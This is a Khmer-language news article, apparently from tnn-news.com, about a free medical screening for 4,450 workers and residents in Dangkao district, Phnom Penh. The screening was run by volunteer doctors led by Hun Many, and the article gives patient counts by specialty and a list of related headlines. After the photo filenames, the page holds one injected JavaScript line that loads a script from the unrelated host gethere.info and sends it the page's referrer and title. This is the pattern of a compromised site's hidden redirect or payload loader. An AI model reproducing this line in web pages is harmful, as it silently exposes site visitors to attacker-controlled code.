កម្មករនិងប្រជាពលរដ្ឋបានចំនួន៤៤៥០នាក់នៅខណ្ឌដង្កោ ទទួលបានការពិនិត្យព្យាបាល ពីក្រុមគ្រូពេទ្យស្មគ្រចិត្តរបស់ ឯកឧត្តម ហ៊ុន ម៉ានី 

2 ខែ មុន 36 តូ សុផល

ភ្នំពេញ៖ សម្ព័ន្ឋគ្រូពេទ្យសហភាពសហព័ន្ឋយុវជនកម្ពុជា កាលពីព្រឹកថ្ងៃទី០៤ ខែធ្នួ ឆ្នាំ២០១៦ បានចុះទៅពិនិត្យនិងព្យាបាលជម្ងឺកម្មករកម្មការិនី និងប្រជាពលរដ្ឋសរុបចំនួន ៤៤៥០នាក់ នៅសាលាបឋមសិក្សាសំបួរមាស ខ័ណ្ឌដង្កោរាជធានីភ្នំេពញ ដោយមានកិច្ចសហការពីសាលារាជធានីភ្នំេពញ អាជ្ញាធរខ័ណ្ឌដង្កោ សហភាពសហព័ន្ឋយុវជនកម្ពុជាខ័ណ្ឌដង្កោ ទីភ្នាក់ងារជំរុញការវិនិយោគនិងពាណិជ្ជកម្មកូរ៉េនិងសភាសម្ព័ន្ឋសហជីពជាតិកម្ពុជា ក្រោមអធីបតីភាពលោកជំទាវឡោក ខេង តំណាងរាស្ត្រមណ្ឌលភ្នំេពញ និងមានការអញ្ជើញចូលរួមពីសំណាក់ឯកឧត្តម ឃួង ស្រេង អភិបាលរងនៃគណៈអភិបាលរាជធានីភ្នំពេញ ឯកឧត្តម ហេង សុខគង់ ប្រធានក្រុមប្រឹក្សាភិបាលសម្ព័ន្ឋគ្រូពេទ្យសភាពសហព័ន្ឋយុវជនកម្ពុជា លោក សោម អូន ប្រធានសភាសម្ព័ន្ឋសហជីពជាតិកម្ពុជា និងលោក នុត ពុធដារ៉ា អភិបាលនៃគណៈអភិបាលខ័ណ្ឌដង្កោ ។

ការពិនិត្យនិងព្យាបាលជម្ងឺរយៈពេលជាងពាក់កណ្តាលថ្ងៃនេះសរុបបានចំនួន៤៤៥០ននាក់ក្នុងនោះ ជម្ងឺទូទៅចំនួន៧៥៤នាក់ ជម្ងឺបេះដូងនិងសរសៃឈាមចំនួន១៤៥នាក់ ជម្ងឺមនុស្សចាស់ចំនួន២៣៤នាក់ ជម្ងឺច្រមុះ ត្រចៀក បំពង់ក ចំនួន២១៤នាក់ ជម្ងឺសើរស្បែកនិងកាមរោគចំនួន២២៤នាក់ ជម្ងឺផ្លូវចិត្តចំនួន៥៤នាក់ ជម្ងឺកុមារចំនួន៣៥៤នាក់ ជម្ងឺវះកាត់និងរោគសន្លាក់ចំនួន២០៤នាក់ក្នុងនោះបានវះកាត់ចំនួន២៥នាក់ ជម្ងឺមាត់ធ្មេញ២៣៤នាក់ ពិនិត្យអេកូសាស្ត្រចំនួន២៤៥នាក់ រោគស្ត្រីនិងពិនិត្យផ្ទៃពោះចំនួន៣០៤នាក់ ផ្នែកមន្ទីរពិសោធន៏ចំនួន៧៦នាក់ ជម្ងឺតម្រងនោមចំនួន១៣៤នាក់ ពិនិត្យបឋមនិងវាស់សម្ពាធឈាមចំនួនចំនួន ១០៨៣នាក់ និងបានបញ្ជូនទៅមន្ទីរពេទ្យបង្អែកចំនួន០១នាក់ ។

យោងតាមស្មារតីអនុសារណៈយោគយល់រវាង NACC ជាមួយសម្ព័ន្ឋគ្រូពេទ្យសហភាពសហព័ន្ឋយុវជនកម្ពុជា នឹងខិតខំរៀបចំការពិនិត្យនិងព្យាបាលជម្ងឺដោយឥតគិតថ្លៃជូនកម្មករ ក៏ដូចប្រជាពលរដ្ឋនៅតាមបណ្តាខ័ណ្ឌផ្សេងៗទៀតដើម្បីជួយធ្វើអោយសុខមាលភាពកម្មករនិងប្រជាពលរដ្ឋក្នុងរាជធានីភ្នំពេញអោយបានប្រសើរឡើង ។

ក្នុងនាមសភាសម្ព័ន្ឋសហជីពជាតិកម្ពុជា និង កម្មករនិយោជិត សូមថ្លែងអំណរគុណយ៉ាងជ្រាលជ្រៅចំពោះសម្ព័ន្ឋគ្រូពេទ្យសហភាពសហព័ន្ឋយុវជនកម្ពុជាដែលផ្តួចផ្តើមបង្កើតឡើងនិងដឹកនាំដោយឯកឧត្តម ហ៊ុន ម៉ានី ដែលបានយកចិត្តទុកដាក់ចុះពិនិត្យនិងព្យាបាលជម្ងឺដោយឥតគិតថ្លៃជូនដល់បងប្អូនកម្មករនិងប្រជាពល ជាពិសេសបានចុះទៅពិនិត្យដោយផ្ទាល់ដល់ទីកន្លែងរស់នៅរបស់ប្រជាពលរដ្ឋនិងកម្មករតែម្តង ៕

15241377_712524735568882_1959718331334037728_n 15253540_712524822235540_291263149807933017_n 15317785_712525055568850_6605758127877295837_n 15319108_712525518902137_8918900942084655230_n 15337507_712525905568765_524041666342951491_n 15350690_712524575568898_3573475091679027036_n

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អាន៖  ឯកឧត្តម ហ៊ុន ម៉ានី ដឹកនាំក្រុមគ្រូពេទ្យស្ម័គ្រចិត្ត ចុះពិនិត្យព្យាបាលជំងឺដោយឥតគិតថ្លៃ ជូនប្រជាពលរដ្ឋជាង៥ពាន់នាក់ នៅខណ្ឌពោធិ៍សែនជ័យ (ផ្សាយផ្ទាល់)

 

 

ឯកឧត្តម ហ៊ុន ម៉ានី ដឹកនាំក្រុមគ្រូពេទ្យស្ម័គ្រចិត្ត ចុះពិនិត្យព្យាបាលជំងឺដោយឥតគិតថ្លៃ ជូនប្រជាពលរដ្ឋជាង៥ពាន់នាក់ នៅខណ្ឌពោធិ៍សែនជ័យ (ផ្សាយផ្ទាល់)

1 ខែ មុន 63 តូ សុផល

គ្លីនិក“សែនសុខសាន្ត”នៅក្រុងប៉ោយប៉ែតល្បីធ្វើអោយមនុស្សស្លាប់នោះបានបើកវិញហើយ

1 ខែ មុន 234 វីជ្ជា ស្លាប់រស់ជារឿងធម្មតា​

គ្លីនិក”យីហោ “សែនសុខសាន្ត” នៅក្រុងប៉ោយប៉ែត រងការចោទថា ព្យាបាលខុសបច្ចេកទេសបណ្តាលអោយមនុស្សស្លាប់

2 ខែ មុន 96 តូ សុផល

អំពាវនាវសូម សម្តេចតេជោ អន្តរាគមន៍ ខណៈគ្លីនិកកែសម្ផស្ស “ដឺប៉ូតេ” (De Beauté Clinic) វះកាត់អ្នកជម្ងឺដោយភាព មិនទទួលខុសត្រូវ ហើយបានស្លាប់ក្រោយពេលបញ្ចូនទៅដល់ក្លីនិក ICU

3 ខែ មុន 715 តូ សុផល
TOP
 

ទំនាក់ទំនង

លេខទូរសព្ទ័: 0963899997, 017987600 ម៉ោងធ្វើការ: ចន្ទ័ - សុក្រ (8am - 5pm) អុីមែល: info@tnn-news.com

បណ្តាញសង្គម